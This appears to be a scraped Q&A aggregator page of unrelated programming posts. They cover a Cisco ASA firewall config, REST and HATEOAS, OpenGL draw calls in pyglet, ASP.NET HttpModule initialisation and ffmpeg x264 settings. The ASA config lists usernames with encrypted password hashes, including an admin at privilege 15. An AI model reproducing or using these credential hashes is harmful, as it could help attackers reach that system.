threat-detection basic-threat threat-detection statistics access-list no threat-detection statistics tcp-intercept webvpn enable outside svc image disk0:/sslclient-win-1.1.0.154.pkg 1 svc image disk0:/anyconnect-win-2.5.2019-k9.pkg 2 svc enable group-policy ATSAdmin internal group-policy ATSAdmin attributes dns-server value 208.77.88.4 208.85.174.9 vpn-tunnel-protocol IPSec svc webvpn webvpn url-list none svc keep-installer installed svc rekey method ssl svc ask enable username qgadmin password /oHfeGQ/R.bd3KPR encrypted privilege 15 username benl password 0HNIGQNI0uruJvhW encrypted privilege 0 username benl attributes vpn-group-policy ATSAdmin username kuzma password rH7MM7laoynyvf9U encrypted privilege 0 username kuzma attributes vpn-group-policy ATSAdmin username nate password BXHOURyT37e4O5mt encrypted privilege 0 username nate attributes vpn-group-policy ATSAdmin tunnel-group ATSAdmin type remote-access tunnel-group ATSAdmin general-attributes address-pool VPNIPs default-group-policy ATSAdmin tunnel-group SSLVPN type remote-access tunnel-group SSLVPN general-attributes address-pool VPNIPs default-group-policy ATSAdmin ! class-map inspection_default match default-inspection-traffic ! ! policy-map type inspect dns preset_dns_map parameters message-length maximum 512 policy-map global_policy class inspection_default inspect dns preset_dns_map inspect ftp inspect h323 h225 inspect h323 ras inspect rsh inspect rtsp inspect esmtp inspect sqlnet inspect skinny inspect sunrpc inspect xdmcp inspect sip inspect netbios inspect tftp inspect ip-options ! service-policy global_policy global privilege cmd level 3 mode exec command perfmon privilege cmd level 3 mode exec command ping privilege cmd level 3 mode exec command who privilege cmd level 3 mode exec command logging privilege cmd level 3 mode exec command failover privilege show level 5 mode exec command running-config privilege show level 3 mode exec command reload privilege show level 3 mode exec command mode privilege show level 3 mode exec command firewall privilege show level 3 mode exec command interface privilege show level 3 mode exec command clock privilege show level 3 mode exec command dns-hosts privilege show level 3 mode exec command access-list privilege show level 3 mode exec command logging privilege show level 3 mode exec command ip privilege show level 3 mode exec command failover privilege show level 3 mode exec command asdm privilege show level 3 mode exec command arp privilege show level 3 mode exec command route privilege show level 3 mode exec command ospf privilege show level 3 mode exec command aaa-server privilege show level 3 mode exec command aaa privilege show level 3 mode exec command crypto privilege show level 3 mode exec command vpn-sessiondb privilege show level 3 mode exec command ssh privilege show level 3 mode exec command dhcpd privilege show level 3 mode exec command vpn privilege show level 3 mode exec command blocks privilege show level 3 mode exec command uauth privilege show level 3 mode configure command interface privilege show level 3 mode configure command clock privilege show level 3 mode configure command access-list privilege show level 3 mode configure command logging privilege show level 3 mode configure command ip privilege show level 3 mode configure command failover privilege show level 5 mode configure command asdm privilege show level 3 mode configure command arp privilege show level 3 mode configure command route privilege show level 3 mode configure command aaa-server privilege show 
level 3 mode configure command aaa privilege show level 3 mode configure command crypto privilege show level 3 mode configure command ssh privilege show level 3 mode configure command dhcpd privilege show level 5 mode configure command privilege privilege clear level 3 mode exec command dns-hosts privilege clear level 3 mode exec command logging privilege clear level 3 mode exec command arp privilege clear level 3 mode exec command aaa-server privilege clear level 3 mode exec command crypto privilege cmd level 3 mode configure command failover privilege clear level 3 mode configure command logging privilege clear level 3 mode configure command arp privilege clear level 3 mode configure command crypto privilege clear level 3 mode configure command aaa-server prompt hostname context call-home profile CiscoTAC-1 no active destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService destination address email [email protected] destination transport-method http subscribe-to-alert-group diagnostic subscribe-to-alert-group environment subscribe-to-alert-group inventory periodic monthly subscribe-to-alert-group configuration periodic monthly subscribe-to-alert-group telemetry periodic daily Cryptochecksum:0ed0580e151af288d865f4f3603d792a : end asdm image disk0:/asdm-635.bin no asdm history enable
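    A hedged troubleshooting sketch (not from the post; these are standard commands on ASA 8.2): packet-tracer shows exactly which phase (ACL, NAT, route) drops the outbound flow, and show xlate confirms which translation the server is actually getting. Stale translations from before the static was added are a classic culprit.

        ! Simulate an outbound web request from the internal test server
        packet-tracer input inside tcp 192.168.1.102 12345 208.77.88.4 80
        ! Inspect the translations currently built for that host
        show xlate | include 192.168.1.102
        ! After changing statics, clear any stale translations for the host
        clear xlate local 192.168.1.102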

    Read the article

  • Is That REST API Really RPC? Roy Fielding Seems to Think So.

    - by Rich Apodaca
    A large amount of what I thought I knew about REST is apparently wrong - and I'm not alone. This question has a long lead-in, but it seems to be necessary because the information is a bit scattered. The actual question comes at the end if you're already familiar with this topic. From the first paragraph of Roy Fielding's REST APIs must be hypertext-driven, it's pretty clear he believes his work is being widely misinterpreted: I am getting frustrated by the number of people calling any HTTP-based interface a REST API. Today’s example is the SocialSite REST API. That is RPC. It screams RPC. There is so much coupling on display that it should be given an X rating. Fielding goes on to list several attributes of a REST API. Some of them seem to go against both common practice and common advice on SO and other forums. For example: A REST API should be entered with no prior knowledge beyond the initial URI (bookmark) and set of standardized media types that are appropriate for the intended audience (i.e., expected to be understood by any client that might use the API). ... A REST API must not define fixed resource names or hierarchies (an obvious coupling of client and server). ... A REST API should spend almost all of its descriptive effort in defining the media type(s) used for representing resources and driving application state, or in defining extended relation names and/or hypertext-enabled mark-up for existing standard media types. ... The idea of "hypertext" plays a central role - much more so than URI structure or what HTTP verbs mean. "Hypertext" is defined in one of the comments: When I [Fielding] say hypertext, I mean the simultaneous presentation of information and controls such that the information becomes the affordance through which the user (or automaton) obtains choices and selects actions. Hypermedia is just an expansion on what text means to include temporal anchors within a media stream; most researchers have dropped the distinction. Hypertext does not need to be HTML on a browser. Machines can follow links when they understand the data format and relationship types. I'm guessing at this point, but the first two points above seem to suggest that API documentation for a Foo resource that looks like the following leads to tight coupling between client and server and has no place in a RESTful system. GET /foos/{id} # read a Foo POST /foos/{id} # create a Foo PUT /foos/{id} # update a Foo Instead, an agent should be forced to discover the URIs for all Foos by, for example, issuing a GET request against /foos. (Those URIs may turn out to follow the pattern above, but that's beside the point.) The response uses a media type that is capable of conveying how to access each item and what can be done with it, giving rise to the third point above. For this reason, API documentation should focus on explaining how to interpret the hypertext contained in the response. Furthermore, every time a URI to a Foo resource is requested, the response contains all of the information needed for an agent to discover how to proceed by, for example, accessing associated and parent resources through their URIs, or by taking action after the creation/deletion of a resource. The key to the entire system is that the response consists of hypertext contained in a media type that itself conveys to the agent options for proceeding. It's not unlike the way a browser works for humans. But this is just my best guess at this particular moment. 
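    To make that guess concrete, here is an entirely hypothetical exchange (the media type and link format are invented for illustration and appear nowhere in Fielding's post): the client starts at the bookmark URI, and every URI it uses afterwards comes out of the response rather than out of the documentation.

        GET /foos
        200 OK
        Content-Type: application/vnd.example.foo+json

        { "foos": [
            { "title": "a foo",
              "links": {
                "self":   { "href": "/foos/17", "method": "GET" },
                "update": { "href": "/foos/17", "method": "PUT" },
                "delete": { "href": "/foos/17", "method": "DELETE" }
              } }
          ],
          "create": { "href": "/foos", "method": "POST" }
        }

    On this reading, the documentation's job is to define what "self", "update", and "create" mean inside application/vnd.example.foo+json, not to enumerate URI templates.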
Fielding posted a follow-up in which he responded to criticism that his discussion was too abstract, lacking in examples, and jargon-rich: Others will try to decipher what I have written in ways that are more direct or applicable to some practical concern of today. I probably won’t, because I am too busy grappling with the next topic, preparing for a conference, writing another standard, traveling to some distant place, or just doing the little things that let me feel I have earned my paycheck. So, two simple questions for the REST experts out there with a practical mindset: how do you interpret what Fielding is saying and how do you put it into practice when documenting/implementing REST APIs? Edit: this question is an example of how hard it can be to learn something if you don't have a name for what you're talking about. The name in this case is "Hypermedia as the Engine of Application State" (HATEOAS).

    Read the article

  • OpenGL basics: calling glDrawElements once per object

    - by Bethor
    Hi all, continuing on from my explorations of the basics of OpenGL (see this question), I'm trying to figure out the basic principles of drawing a scene with OpenGL. I am trying to render a simple cube repeated n times in every direction. My method appears to yield terrible performance: 1000 cubes brings performance below 50 fps (on a QuadroFX 1800, roughly a GeForce 9600GT). My method for drawing these cubes is as follows: done once: set up a vertex buffer and array buffer containing my cube vertices in model space, and set up an array buffer indexing the cube for drawing as 12 triangles; done for each frame: update uniform values used by the vertex shader to move all cubes at once; done for each cube, for each frame: update uniform values used by the vertex shader to move each cube to its position, then call glDrawElements to draw the positioned cube. Is this a sane method? If not, how does one go about something like this? I'm guessing I need to minimize calls to glUniform, glDrawElements, or both, but I'm not sure how to do that (one possibility is sketched after the code listing below). Full code for my little test (depends on gletools and pyglet): I'm aware that my init code (at least) is really ugly; I'm concerned with the rendering code for each frame right now, I'll move to something a little less insane for the creation of the vertex buffers and such later on. import pyglet from pyglet.gl import * from pyglet.window import key from numpy import deg2rad, tan from gletools import ShaderProgram, FragmentShader, VertexShader, GeometryShader vertexData = [-0.5, -0.5, -0.5, 1.0, -0.5, 0.5, -0.5, 1.0, 0.5, -0.5, -0.5, 1.0, 0.5, 0.5, -0.5, 1.0, -0.5, -0.5, 0.5, 1.0, -0.5, 0.5, 0.5, 1.0, 0.5, -0.5, 0.5, 1.0, 0.5, 0.5, 0.5, 1.0] elementArray = [2, 1, 0, 1, 2, 3,## back face 4, 7, 6, 4, 5, 7,## front face 1, 3, 5, 3, 7, 5,## top face 2, 0, 4, 2, 4, 6,## bottom face 1, 5, 4, 0, 1, 4,## left face 6, 7, 3, 6, 3, 2]## right face def toGLArray(input): return (GLfloat*len(input))(*input) def toGLushortArray(input): return (GLushort*len(input))(*input) def initPerspectiveMatrix(aspectRatio = 1.0, fov = 45): frustumScale = 1.0 / tan(deg2rad(fov) / 2.0) fzNear = 0.5 fzFar = 300.0 perspectiveMatrix = [frustumScale*aspectRatio, 0.0 , 0.0 , 0.0 , 0.0 , frustumScale, 0.0 , 0.0 , 0.0 , 0.0 , (fzFar+fzNear)/(fzNear-fzFar) , -1.0, 0.0 , 0.0 , (2*fzFar*fzNear)/(fzNear-fzFar), 0.0 ] return perspectiveMatrix class ModelObject(object): vbo = GLuint() vao = GLuint() eao = GLuint() initDone = False verticesPool = [] indexPool = [] def __init__(self, vertices, indexing): super(ModelObject, self).__init__() if not ModelObject.initDone: glGenVertexArrays(1, ModelObject.vao) glGenBuffers(1, ModelObject.vbo) glGenBuffers(1, ModelObject.eao) glBindVertexArray(ModelObject.vao) ModelObject.initDone = True self.numIndices = len(indexing) self.offsetIntoVerticesPool = len(ModelObject.verticesPool) ModelObject.verticesPool.extend(vertices) self.offsetIntoElementArray = len(ModelObject.indexPool) ModelObject.indexPool.extend(indexing) glBindBuffer(GL_ARRAY_BUFFER, ModelObject.vbo) glEnableVertexAttribArray(0) #position glVertexAttribPointer(0, 4, GL_FLOAT, GL_FALSE, 0, 0) glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, ModelObject.eao) glBufferData(GL_ARRAY_BUFFER, len(ModelObject.verticesPool)*4, toGLArray(ModelObject.verticesPool), GL_STREAM_DRAW) glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(ModelObject.indexPool)*2, toGLushortArray(ModelObject.indexPool), GL_STREAM_DRAW) def draw(self): glDrawElements(GL_TRIANGLES, self.numIndices, GL_UNSIGNED_SHORT, self.offsetIntoElementArray) class PositionedObject(object):
def __init__(self, mesh, pos, objOffsetUf): super(PositionedObject, self).__init__() self.mesh = mesh self.pos = pos self.objOffsetUf = objOffsetUf def draw(self): glUniform3f(self.objOffsetUf, self.pos[0], self.pos[1], self.pos[2]) self.mesh.draw() w = 800 h = 600 AR = float(h)/float(w) window = pyglet.window.Window(width=w, height=h, vsync=False) window.set_exclusive_mouse(True) pyglet.clock.set_fps_limit(None) ## input forward = [False] left = [False] back = [False] right = [False] up = [False] down = [False] inputs = {key.Z: forward, key.Q: left, key.S: back, key.D: right, key.UP: forward, key.LEFT: left, key.DOWN: back, key.RIGHT: right, key.PAGEUP: up, key.PAGEDOWN: down} ## camera camX = 0.0 camY = 0.0 camZ = -1.0 def simulate(delta): global camZ, camX, camY scale = 10.0 move = scale*delta if forward[0]: camZ += move if back[0]: camZ += -move if left[0]: camX += move if right[0]: camX += -move if up[0]: camY += move if down[0]: camY += -move pyglet.clock.schedule(simulate) @window.event def on_key_press(symbol, modifiers): global forward, back, left, right, up, down if symbol in inputs.keys(): inputs[symbol][0] = True @window.event def on_key_release(symbol, modifiers): global forward, back, left, right, up, down if symbol in inputs.keys(): inputs[symbol][0] = False ## uniforms for shaders camOffsetUf = GLuint() objOffsetUf = GLuint() perspectiveMatrixUf = GLuint() camRotationUf = GLuint() program = ShaderProgram( VertexShader(''' #version 330 layout(location = 0) in vec4 objCoord; uniform vec3 objOffset; uniform vec3 cameraOffset; uniform mat4 perspMx; void main() { mat4 translateCamera = mat4(1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, cameraOffset.x, cameraOffset.y, cameraOffset.z, 1.0f); mat4 translateObject = mat4(1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, objOffset.x, objOffset.y, objOffset.z, 1.0f); vec4 modelCoord = objCoord; vec4 positionedModel = translateObject*modelCoord; vec4 cameraPos = translateCamera*positionedModel; gl_Position = perspMx * cameraPos; }'''), FragmentShader(''' #version 330 out vec4 outputColor; const vec4 fillColor = vec4(1.0f, 1.0f, 1.0f, 1.0f); void main() { outputColor = fillColor; }''') ) shapes = [] def init(): global camOffsetUf, objOffsetUf with program: camOffsetUf = glGetUniformLocation(program.id, "cameraOffset") objOffsetUf = glGetUniformLocation(program.id, "objOffset") perspectiveMatrixUf = glGetUniformLocation(program.id, "perspMx") glUniformMatrix4fv(perspectiveMatrixUf, 1, GL_FALSE, toGLArray(initPerspectiveMatrix(AR))) obj = ModelObject(vertexData, elementArray) nb = 20 for i in range(nb): for j in range(nb): for k in range(nb): shapes.append(PositionedObject(obj, (float(i*2), float(j*2), float(k*2)), objOffsetUf)) glEnable(GL_CULL_FACE) glCullFace(GL_BACK) glFrontFace(GL_CW) glEnable(GL_DEPTH_TEST) glDepthMask(GL_TRUE) glDepthFunc(GL_LEQUAL) glDepthRange(0.0, 1.0) glClearDepth(1.0) def update(dt): print pyglet.clock.get_fps() pyglet.clock.schedule_interval(update, 1.0) @window.event def on_draw(): with program: pyglet.clock.tick() glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT) glUniform3f(camOffsetUf, camX, camY, camZ) for shape in shapes: shape.draw() init() pyglet.app.run()
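    For what it's worth, a hedged sketch of one standard answer, assuming an OpenGL 3.3 context (glDrawElementsInstanced and gl_InstanceID) and reusing toGLArray, shapes, and obj from the code above: replace the per-cube glUniform3f/glDrawElements pair with one instanced call, and let gl_InstanceID pick each cube's offset. In the vertex shader, declare uniform vec3 offsets[1000]; and read vec3 off = offsets[gl_InstanceID]; in place of the objOffset uniform (offsetsUf below is the hypothetical location of that array).

        # Upload every cube offset once per frame (or only when they change)...
        allOffsets = [c for shape in shapes for c in shape.pos]
        glUniform3fv(offsetsUf, len(shapes), toGLArray(allOffsets))
        # ...then draw all cubes with a single call instead of one per cube.
        glDrawElementsInstanced(GL_TRIANGLES, obj.numIndices,
                                GL_UNSIGNED_SHORT, 0, len(shapes))

    Uniform arrays are size-limited (often to a few thousand components), so a per-instance vertex attribute fed through glVertexAttribDivisor, or a texture buffer, is the scalable variant of the same idea.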

    Read the article

  • HttpModule Init method is called several times - why?

    - by MartinF
    I was creating an HTTP module and while debugging I noticed something which at first (at least) seemed like weird behaviour. When I set a breakpoint in the Init method of the HttpModule I can see that the Init method is being called several times even though I have only started up the website for debugging and made one single request (sometimes it is hit only once, other times as many as 10 times). I know that I should expect several instances of the HttpApplication to be running, and for each of them the HTTP modules will be created, but when I request a single page it should be handled by a single HttpApplication object and therefore only fire the associated events once. Still, it fires the events several times for each request, which makes no sense - other than that the handler must have been added several times within that HttpApplication - which means it is the same HttpModule Init method that is being called every time, and not a new HttpApplication being created each time it hits my breakpoint (see my code example at the bottom etc.). What could be going wrong here? Is it because I am debugging and set a breakpoint in the HTTP module? I have noticed that if I start up the website for debugging and quickly step over the breakpoint in the HttpModule, it will only hit the Init method once, and the same goes for the event handler. If I instead let it hang at the breakpoint for a few seconds, the Init method is called several times (it seems to depend on how long I wait before stepping over the breakpoint). Maybe this could be some built-in feature to make sure that the HttpModule is initialised and the HttpApplication can serve requests, but it also seems like something that could have catastrophic consequences. This could seem logical, as it might be trying to finish the request, and since I have set the breakpoint it thinks something has gone wrong and tries to call the Init method again - so it can handle the request? But is this what is happening and is everything fine (I am just guessing), or is it a real problem? What I am especially concerned about is that if something makes it hang on the "production/live" server for a few seconds, a lot of event handlers are added through Init, and therefore each request to the page suddenly fires the event handler several times. This behaviour could quickly bring any site down. I have looked at the "original" .NET code used for the HTTP modules for FormsAuthentication and the RoleManagerModule etc., but my code isn't any different from what those modules use. My code looks like this. public void Init(HttpApplication app) { if (CommunityAuthenticationIntegration.IsEnabled) { FormsAuthenticationModule formsAuthModule = (FormsAuthenticationModule) app.Modules["FormsAuthentication"]; formsAuthModule.Authenticate += new FormsAuthenticationEventHandler(this.OnAuthenticate); } } Here is an example of how it is done in the RoleManagerModule from the .NET Framework: public void Init(HttpApplication app) { if (Roles.Enabled) { app.PostAuthenticateRequest += new EventHandler(this.OnEnter); app.EndRequest += new EventHandler(this.OnLeave); } } Does anyone know what is going on? (I just hope someone out there can tell me why this is happening and assure me that everything is perfectly fine) :) UPDATE: I have tried to narrow down the problem and so far I have found that the Init method is always being called on a new object of my HTTP module (contrary to what I thought before).
It seems that for the first request (when starting up the site) all of the HttpApplication objects being created, along with their modules, are trying to serve the first request and therefore all hit the event handler that has been added. I can't really figure out why this is happening. If I request another page, all the HttpApplications created (and their modules) will again try to serve the request, causing it to hit the event handler multiple times. But it also seems that if I then jump back to the first page (or another one), only one HttpApplication will start to take care of the request and everything is as expected - as long as I don't let it hang at a breakpoint. If I let it hang at a breakpoint, it begins to create new HttpApplication objects and starts adding HttpApplications (more than 1) to serve/handle the request (which is already in the process of being served by the HttpApplication which is currently stopped at the breakpoint). I guess, or hope, that it might be some intelligent "behind the scenes" way of helping to distribute and handle load and/or errors. But I have no clue. I hope someone out there can assure me that it is perfectly fine and how it is supposed to be.
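    One way to take the guesswork out of this (a hedged diagnostic sketch, not from the post): log the hash codes of the module and its HttpApplication inside Init. If every call prints a different pair, ASP.NET is simply building its usual pool of HttpApplication instances, each with its own module chain and each calling Init exactly once, and no handler is being double-subscribed on a single instance.

        public void Init(HttpApplication app)
        {
            // Distinct module/application pairs here mean instance pooling,
            // not duplicate subscriptions on one HttpApplication.
            System.Diagnostics.Debug.WriteLine(string.Format(
                "Init: module {0:x8} on application {1:x8}",
                this.GetHashCode(), app.GetHashCode()));

            if (CommunityAuthenticationIntegration.IsEnabled)
            {
                FormsAuthenticationModule formsAuthModule =
                    (FormsAuthenticationModule)app.Modules["FormsAuthentication"];
                formsAuthModule.Authenticate +=
                    new FormsAuthenticationEventHandler(this.OnAuthenticate);
            }
        }

    Since the subscription target (formsAuthModule) lives on the same HttpApplication as the module doing the subscribing, each pooled application only ever fires the handlers it registered itself.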

    Read the article

  • Use DivX settings to encode to mp4 with ffmpeg

    - by sjngm
    I'm used to using VirtualDub to encode a video to an AVI container with the DivX codec (and MP3 for audio). Now I'm planning to use ffmpeg to encode videos to an MP4 container with the h264 codec. What I've figured out is that I need to use libx264 and one of those presets to make anything work. However, I'm amazed at the video bitrate ffmpeg uses for encoding. What I currently have is this little batch file: @ECHO OFF SETLOCAL SET IN=source.avs SET FFMPEG_PATH=C:\Program Files (x86)\ffmpeg SET PRESET=-fpre "%FFMPEG_PATH%\presets\libx264-lossless_slow.ffpreset" SET AUDIO=-acodec libmp3lame -ab 128000 SET VIDEO=-vcodec libx264 -vb 1978000 "%FFMPEG_PATH%\ffmpeg.exe" -i %IN% %AUDIO% %VIDEO% %PRESET% test.mp4 ENDLOCAL With this I tell ffmpeg to use 1978k as the bitrate, but ffmpeg uses 15000k+! I tried other presets, but they don't use my specified bitrate. Here are the presets I have: libx264-baseline.ffpreset libx264-ipod320.ffpreset libx264-ipod640.ffpreset libx264-lossless_fast.ffpreset libx264-lossless_max.ffpreset libx264-lossless_medium.ffpreset libx264-lossless_slow.ffpreset libx264-lossless_slower.ffpreset libx264-lossless_ultrafast.ffpreset ffmpeg version: FFmpeg git-N-29181-ga304071 libavutil 50. 40. 1 / 50. 40. 1 libavcodec 52.120. 0 / 52.120. 0 libavformat 52.108. 0 / 52.108. 0 libavdevice 52. 4. 0 / 52. 4. 0 libavfilter 1. 79. 0 / 1. 79. 0 libswscale 0. 13. 0 / 0. 13. 0 Note that I don't use the latest version as it has problems with spaces in filenames. Here's what seems to be the full parameter list DivX 6.9.2 uses: -bvnn 1978000 -vbv 218691200,100663296,100663296 -dir "C:\Users\sjngm\AppData\Roaming\DivX\DivX Codec" -w -b 1 -use_presets=1 -preset=10 -windowed_fullsearch=2 -thread_delay=1 What command line parameters would that be for ffmpeg? EDIT: Going with slhck's suggestion I tried a new 32-bit version. I have no idea if that is 0.9 or newer; I can't find that info. ffmpeg version N-36890-g67f5650 libavutil 51. 34.100 / 51. 34.100 libavcodec 53. 56.105 / 53. 56.105 libavformat 53. 30.100 / 53. 30.100 libavdevice 53. 4.100 / 53. 4.100 libavfilter 2. 59.100 / 2. 59.100 libswscale 2. 1.100 / 2. 1.100 libswresample 0. 6.100 / 0. 6.100 libpostproc 51. 2.100 / 51. 2.100 I reworked my batch file to look like this (interestingly enough I can't find the parameter -vprofile in the documentation): @ECHO OFF SETLOCAL SET IN=VTS_01_1.avs SET FFMPEG_PATH=C:\Program Files (x86)\ffmpeg SET PRESET=-vprofile high -preset veryslow SET AUDIO=-acodec libmp3lame -ab 128000 SET VIDEO=-vcodec libx264 -vb 1978000 "%FFMPEG_PATH%\ffmpeg.exe" -i %IN% %AUDIO% %PRESET% %VIDEO% test.mp4 ENDLOCAL I see that it now uses the bitrate properly (thanks to LongNeckbeard for pointing out that the lossless stuff ignores the bitrate!). Just in case you wonder how I came up with the 1978000, I'm using this formula, which I found valid for DivX files (I'm guessing the bitrate won't change that much for h264): width * height * 25 * 0.22 / 1000 I'm not sure if the 0.22 correlates with the CRF somehow. Overall, I forgot to say that I will use a two-pass scenario, which is why I don't use the CRF here. I will try to read more about this. Currently I'm just trying to get something running that shows me that I'm doing something right (ffmpeg isn't the easiest tool to understand ;)).
    "C:\Program Files (x86)\ffmpeg\ffmpeg.exe" -i VTS_01_1.avs -acodec libmp3lame -ab 128000 -vcodec libx264 -vb 1978000 -vprofile high -preset veryslow test.mp4

The output is now:

    ffmpeg version N-36890-g67f5650 Copyright (c) 2000-2012 the FFmpeg developers
    built on Jan 16 2012 21:57:13 with gcc 4.6.2
    configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-runtime-cpudetect --enable-avisynth --enable-bzlib --enable-frei0r --enable-libopencore-amrnb --enable-libopencore-amrwb --enable-libfreetype --enable-libgsm --enable-libmp3lame --enable-libopenjpeg --enable-librtmp --enable-libschroedinger --enable-libspeex --enable-libtheora --enable-libvo-aacenc --enable-libvo-amrwbenc --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libxavs --enable-libxvid --enable-zlib
    libavutil 51. 34.100 / 51. 34.100
    libavcodec 53. 56.105 / 53. 56.105
    libavformat 53. 30.100 / 53. 30.100
    libavdevice 53. 4.100 / 53. 4.100
    libavfilter 2. 59.100 / 2. 59.100
    libswscale 2. 1.100 / 2. 1.100
    libswresample 0. 6.100 / 0. 6.100
    libpostproc 51. 2.100 / 51. 2.100
    Input #0, avs, from 'VTS_01_1.avs':
    Duration: 00:58:46.12, start: 0.000000, bitrate: 0 kb/s
    Stream #0:0: Video: rawvideo (YV12 / 0x32315659), yuv420p, 576x448, 77414 kb/s, 25 tbr, 25 tbn, 25 tbc
    Stream #0:1: Audio: pcm_s16le ([1][0][0][0] / 0x0001), 48000 Hz, 2 channels, s16, 1536 kb/s
    File 'test.mp4' already exists. Overwrite ? [y/N] y
    w:576 h:448 pixfmt:yuv420p tb:1/1000000 sar:0/1 sws_param:
    [libx264 @ 05A2C400] using cpu capabilities: MMX2 SSE2Fast FastShuffle SSEMisalign LZCNT
    [libx264 @ 05A2C400] profile High, level 3.1
    [libx264 @ 05A2C400] 264 - core 120 r2120 0c7dab9 - H.264/MPEG-4 AVC codec - Copyleft 2003-2011 - http://www.videolan.org/x264.html - options: cabac=1 ref=16 deblock=1:0:0 analyse=0x3:0x133 me=umh subme=10 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=24 chroma_me=1 trellis=2 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=3 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=8 b_pyramid=2 b_adapt=2 b_bias=0 direct=3 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=60 rc=abr mbtree=1 bitrate=1978 ratetol=1.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00
    Output #0, mp4, to 'test.mp4':
    Metadata:
    encoder : Lavf53.30.100
    Stream #0:0: Video: h264 (![0][0][0] / 0x0021), yuv420p, 576x448, q=-1--1, 1978 kb/s, 25 tbn, 25 tbc
    Stream #0:1: Audio: mp3 (i[0][0][0] / 0x0069), 48000 Hz, 2 channels, s16, 128 kb/s
    Stream mapping:
    Stream #0:0 -> #0:0 (rawvideo -> libx264)
    Stream #0:1 -> #0:1 (pcm_s16le -> libmp3lame)
    Press [q] to stop, [?] for help
    frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s
    frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s
    frame= 0 fps= 0 q=0.0 size= 0kB time=00:00:00.00 bitrate= 0.0kbits/s
    frame= 3 fps= 1 q=22.0 size= 39kB time=00:00:00.04 bitrate=8063.8kbits/s
    frame= 8 fps= 2 q=22.0 size= 82kB time=00:00:00.24 bitrate=2801.3kbits/s
    frame= 13 fps= 3 q=23.0 size= 120kB time=00:00:00.44 bitrate=2229.5kbits/s
    frame= 16 fps= 4 q=23.0 size= 147kB time=00:00:00.56 bitrate=2156.7kbits/s
    frame= 20 fps= 4 q=22.0 size= 175kB time=00:00:00.72 bitrate=1987.4kbits/s
    video:4387kB audio:273kB global headers:0kB muxing overhead 0.260038%
    [libx264 @ 05A2C400] frame I:2 Avg QP:19.53 size: 29850
    [libx264 @ 05A2C400] frame P:76 Avg QP:22.24 size: 19541
    [libx264 @ 05A2C400] frame B:359 Avg QP:25.93 size: 8210
    [libx264 @ 05A2C400] consecutive B-frames: 0.5% 0.5% 0.0% 8.2% 17.2% 52.2% 16.0% 5.5% 0.0%
    [libx264 @ 05A2C400] mb I I16..4: 5.4% 75.3% 19.3%
    [libx264 @ 05A2C400] mb P I16..4: 1.3% 16.5% 2.2% P16..4: 36.3% 28.6% 12.7% 1.8% 0.2% skip: 0.4%
    [libx264 @ 05A2C400] mb B I16..4: 0.4% 3.8% 0.3% B16..8: 40.0% 18.4% 4.7% direct:18.5% skip:13.9% L0:45.4% L1:38.1% BI:16.5%
    [libx264 @ 05A2C400] final ratefactor: 20.35
    [libx264 @ 05A2C400] 8x8 transform intra:83.1% inter:68.5%
    [libx264 @ 05A2C400] direct mvs spatial:99.2% temporal:0.8%
    [libx264 @ 05A2C400] coded y,uvDC,uvAC intra: 64.9% 83.4% 49.2% inter: 49.0% 50.4% 4.4%
    [libx264 @ 05A2C400] i16 v,h,dc,p: 25% 22% 27% 26%
    [libx264 @ 05A2C400] i8 v,h,dc,ddl,ddr,vr,hd,vl,hu: 10% 7% 23% 9% 10% 10% 10% 10% 13%
    [libx264 @ 05A2C400] i4 v,h,dc,ddl,ddr,vr,hd,vl,hu: 12% 11% 13% 9% 12% 11% 10% 9% 12%
    [libx264 @ 05A2C400] i8c dc,h,v,p: 42% 28% 16% 14%
    [libx264 @ 05A2C400] Weighted P-Frames: Y:18.4% UV:7.9%
    [libx264 @ 05A2C400] ref P L0: 29.1% 11.3% 15.7% 7.3% 6.9% 4.9% 5.1% 3.4% 3.9% 2.7% 2.8% 1.8% 1.7% 1.2% 1.4% 0.9%
    [libx264 @ 05A2C400] ref B L0: 68.8% 11.4% 5.5% 2.9% 2.3% 1.9% 1.5% 1.1% 1.1% 1.0% 0.9% 0.7% 0.5% 0.3% 0.1%
    [libx264 @ 05A2C400] ref B L1: 91.9% 8.1%
    [libx264 @ 05A2C400] kb/s:2055.88

As far as I'm concerned it doesn't look that bad to me.
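Since the question mentions a two-pass scenario, a rough sketch of what that might look like with this era's ffmpeg follows; the exact flag spellings (-vb vs. -b:v, and -f rawvideo for the discarded first pass) vary between builds, so treat them as assumptions to check against the installed version:

```bat
@ECHO OFF
SETLOCAL
SET IN=VTS_01_1.avs
SET FFMPEG_PATH=C:\Program Files (x86)\ffmpeg
REM Pass 1: analysis only - no audio, output discarded to NUL
"%FFMPEG_PATH%\ffmpeg.exe" -i %IN% -vcodec libx264 -vb 1978000 -vprofile high -preset veryslow -pass 1 -an -f rawvideo -y NUL
REM Pass 2: real encode using the stats file written by pass 1
"%FFMPEG_PATH%\ffmpeg.exe" -i %IN% -acodec libmp3lame -ab 128000 -vcodec libx264 -vb 1978000 -vprofile high -preset veryslow -pass 2 test.mp4
ENDLOCAL
```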

    Read the article

  • How to simulate browser file upload with HttpWebRequest

    - by cucicov
